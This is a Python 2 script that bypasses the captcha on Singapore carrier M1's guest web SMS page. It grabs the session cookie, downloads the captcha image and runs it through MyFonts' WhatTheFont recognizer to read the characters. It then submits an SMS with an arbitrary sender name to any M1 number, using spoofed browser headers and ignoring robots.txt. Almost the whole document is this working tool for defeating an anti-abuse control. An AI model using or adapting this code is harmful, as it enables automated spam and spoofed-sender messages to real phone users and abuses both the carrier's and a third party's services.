Hacking M1 SMS Captcha using Free Internet Services

1. from os import popen, system
2. from urllib import urlencode
3. from urllib2 import urlopen, Request
4. import mechanize
5. import cookielib
6. from BeautifulSoup import BeautifulSoup
7. import sys, getopt
8.  
9. def sendsms():
10.     #You will need to fill in field_from, field_contactno and field_msg"
11.     global field_from
12.     global field_contactno
13.     global field_msg
14.  
15.     field_counter = 150-len(field_msg)
16.  
17.     # Extract the JSessionID from the cookie by loading the below page
18.     URL_BASE='http://msgctr.m1.com.sg/guest/'
19.     set_cookie = urlopen(URL_BASE).headers.getheader("Set-Cookie")
20.     sess_id = set_cookie[set_cookie.index("=")+1:set_cookie.index(";")]
21.  
22.     # Construct headers dictionary using the JSESSIONID
23.     headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0) Gecko/20100101 Firefox/10.0',
24.     'Host':'msgctr.m1.com.sg',
25.     'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
26.     'Accept-Language':'en-us,en;q=0.5',
27.     'Accept-Encoding':'gzip,deflate',
28.     'Accept-Charset':'ISO-8859-1,utf-8;q=0.7,*;q=0.7','Cookie':'JSESSIONID='+sess_id}
29.  
30.     # Extract the location for the captcha image
31.     text = (urlopen(Request(URL_BASE+"index.jsp",headers=headers)).read())
32.     for line in text.split("\n"):
33.         if "/guest/captcha.jpg" in line:
34.             line = (line.replace('<img src="','')).strip()
35.             position = line.find('"')
36.             captchaText = line[1:position].strip("guest/")
37.             sessionID = captchaText.strip("captcha.jpg?session=")  
38.                    
39.     # Save the captcha image to local disk
40.     localFile = open('img.jpg', 'wb')
41.     localFile.write(urlopen(Request(URL_BASE+captchaText,headers=headers)).read())
42.     localFile.close()
43.  
44.     # Use the function at myfonts.com to decode the captcha
45.     br = mechanize.Browser()
46.        
47.     # Set the mechanize handle options
48.     br.set_handle_redirect(True)
49.     br.set_handle_robots(False)
50.        
51.     # Load the website
52.     r = br.open('http://new.myfonts.com/WhatTheFont')
53.     html = r.read()
54.  
55.     # Upload the captcha image 
56.     br.select_form(nr=1)
57.     filename='img.jpg'
58.     br.form.add_file(open(filename,"rb"),'image/jpeg',filename,name='userfile')
59.     br.submit()
60.  
61.     soup = BeautifulSoup(br.response().read())
62.  
63.     #Extract the captcha results
64.     captcha1 = soup.find('input', id='wtfchar0')
65.     captcha2 = soup.find('input', id='wtfchar1')
66.     captcha3 = soup.find('input', id='wtfchar2')
67.  
68.     if(captcha1!="" and captcha2!="" and captcha3!=""):
69.         result = (str(captcha1['value'])+str(captcha2['value'])+str(captcha3['value'])).upper()
70.                    
71.         # Encode POST parameters for the capcha page
72.         data = urlencode( {"from":field_from,"locale":"en",
73.             "msisdn":field_contactno,"msg":field_msg,
74.             "counter":field_counter,"sessionid":sessionID,"code":result} )
75.            
76.         # Construct headers dictionary using the JSESSIONID
77.         headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0) Gecko/20100101 Firefox/10.0',
78.         'Host':'msgctr.m1.com.sg',
79.         'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
80.         'Referer':'http://msgctr.m1.com.sg/guest/index.jsp',
81.         'Content-Type':'application/x-www-form-urlencoded',
82.         'Accept-Language':'en-us,en;q=0.5',
83.         'Accept-Encoding':'gzip,deflate',
84.         'Accept-Charset':'ISO-8859-1,utf-8;q=0.7,*;q=0.7','Cookie':'JSESSIONID='+sess_id}
85.                    
86.         # Submit the form
87.         POST_URL = "http://msgctr.m1.com.sg/guest/processMessage.jsp?msisdn="+str(field_contactno.strip())
88.         postOutput = urlopen(Request(POST_URL,headers=headers),data).read()
89.         if "notice=thankyou" in postOutput:
90.             print "SMS sent"
91.         else:
92.             print "Cannot read captcha.  Please retry"
93.     else:
94.         print "Cannot read captcha.  Please retry"
95.        
96. def printSyntax():
97.     """Print application syntax."""
98.  
99.     print "\nUsage:"
100.     print "------------------------------"
101.     print "python  "+str(__file__)+" OPTIONS"
102.  
103.     print "\nValid OPTIONS are:"
104.     print "------------------------------"
105.     print "  -m <message>           Specify the sms message to be sent"
106.     print "  -f <name>              Specify the sender's name"                  
107.     print "  -t <mobile number>         Specify the M1 mobile number"
108.  
109.     print "\nContact:"
110.     print "------------------------------"
111.  
112.     print "[Web]           http://milo2012.wordpress.com"
113.     print "[Mail/Google+]  keith.lee2012@gmail.com"
114.     print "[twitter]       @keith55"
115.  
116.    
117. def main():
118.  
119.     global field_from
120.     global field_contactno
121.     global field_msg
122.    
123.     field_msg = None
124.     field_contactno = None
125.     field_from = None
126.    
127.     if len (sys.argv) < 6:
128.         printSyntax()
129.         sys.exit(1)
130.     else:
131.         try:
132.             opts, args = getopt.getopt (sys.argv[1:], "m:f:t:")
133.         except:
134.             printSyntax()
135.             sys.exit(1)
136.    
137.         for opt, arg in opts:
138.             if opt == '-m':
139.                 field_msg= arg
140.             elif opt == '-f':
141.                 field_from = arg
142.             elif opt == '-t':
143.                 field_contactno = arg      
144.         sendsms()
145.  
146. if __name__ == "__main__":
147.     main()